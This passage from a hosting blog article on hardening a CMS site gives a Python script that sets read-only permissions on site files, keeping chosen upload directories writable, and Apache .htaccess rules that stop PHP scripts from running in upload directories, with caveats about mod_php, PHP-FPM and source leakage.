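left alone. Run it as the file owner over SSH, not via the web server.
"""
import os
import stat


def _apply(root, file_mode, dir_mode, writable, writable_file_mode, writable_dir_mode):
    """Walk root top-down and chmod every directory and regular file. Returns the count."""

    def is_writable(rel):
        return any(rel == w or rel.startswith(w.rstrip("/") + "/") for w in writable)

    changed = 0
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        rel_dir = "" if rel_dir == "." else rel_dir
        # chmod does not need write permission on the parent, only ownership,
        # so walking into a directory that is already 555 is fine.
        os.chmod(dirpath, writable_dir_mode if is_writable(rel_dir) else dir_mode)
        changed += 1
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            rel = os.path.join(rel_dir, name) if rel_dir else name
            os.chmod(path, writable_file_mode if is_writable(rel) else file_mode)
            changed += 1
    return changed


def protect(root, writable=()):
    """444 for files and 555 for directories, except the writable subtrees (644/755)."""
    return _apply(root, 0o444, 0o555, writable, 0o644, 0o755)


def unprotect(root):
    """Back to 644/755 everywhere, e.g. before updating the CMS or a plugin."""
    return _apply(root, 0o644, 0o755, (), 0o644, 0o755)


def mode_of(path):
    """Permission bits of path as an int (0o644 etc.), for checking the result."""
    return stat.S_IMODE(os.stat(path).st_mode)


def build_sample(base):
    """Constructed sample site tree: core files plus an uploads directory."""
    os.makedirs(os.path.join(base, "wp-includes"))
    os.makedirs(os.path.join(base, "wp-content", "uploads"))
    for rel in ("index.php", "wp-includes/load.php", "wp-content/uploads/photo.jpg"):
        with open(os.path.join(base, rel), "w") as f:
            f.write("sample\n")
    return base


if __name__ == "__main__":
    import sys
    import tempfile

    if len(sys.argv) >= 3 and sys.argv[1] in ("protect", "unprotect"):
        root = sys.argv[2]
        n = protect(root, writable=sys.argv[3:]) if sys.argv[1] == "protect" else unprotect(root)
    else:  # no arguments: demonstrate on the constructed sample
        root = build_sample(tempfile.mkdtemp())
        n = protect(root, writable=["wp-content/uploads"])
    print(f"changed {n} entries under {root}")
```

Usage: `python3 siteperms.py protect /var/www/site wp-content/uploads wp-content/cache` before going live, `python3 siteperms.py unprotect /var/www/site` before an update. Files such as wp-config.php that the CMS itself never rewrites are correctly read-only afterwards; if a plugin breaks, its own writable directory belongs on the list, not a blanket unprotect.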

For directories (backup/log/image/...) where 555 cannot be set and which should not contain scripts, add an .htaccess file with this content:

RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml

This stops potentially dangerous scripts from running: PHP code in a directory that should not contain executable files is no longer executed. Two caveats. First, the application/x-httpd-php-source type makes mod_php serve the file as highlighted source, so the contents of an uploaded script become readable to anyone who requests it; denying access to script extensions altogether is cleaner. Second, this works only where PHP runs as mod_php and .htaccess overrides are honoured: with PHP-FPM/FastCGI the handler mapping lives in the server configuration and AddType does nothing, and an attacker who can write into the directory can also overwrite its .htaccess, so the same rules are safer in the virtual host configuration with AllowOverride None.
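A version of this rule that does not leak source and also covers PHP-FPM hosts, as an added example that is not part of the article (the directory path and the extension list are assumptions):

```apache
# Added example: stop script execution in a directory that only holds data.
# Use it in the directory's .htaccess, or (preferred) in the vhost config as
#   <Directory "/var/www/site.example/upload"> ... </Directory>
# with AllowOverride None, so an uploaded .htaccess cannot re-enable PHP.

# mod_php: switch the PHP engine off for this subtree (module name depends on
# the PHP major version; both blocks are harmless where the module is absent).
<IfModule mod_php7.c>
    php_flag engine off
</IfModule>
<IfModule mod_php.c>
    php_flag engine off
</IfModule>

# PHP-FPM/FastCGI ignores php_flag, so additionally refuse to serve script
# files at all, whatever handler their extension is mapped to elsewhere.
<FilesMatch "\.(php[0-9]?|phtml|phps|phar|pht|cgi|pl|py|sh)$">
    Require all denied
</FilesMatch>

# Drop any handler/type mapping inherited from a parent .htaccess or the
# server config, so "AddHandler ... .jpg" tricks do not apply in here.
RemoveHandler .php .phtml .phar .phps
RemoveType .php .phtml .phar .phps
```

Verify it by placing a harmless test.php in the directory and requesting it: the answer must be 403, neither executed output nor the file's source. Remember that on PHP-FPM a .user.ini in the same writable directory is still honoured, so keep scanning such directories for .user.ini and .htaccess files you did not create.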

Published on the Vepp blog.
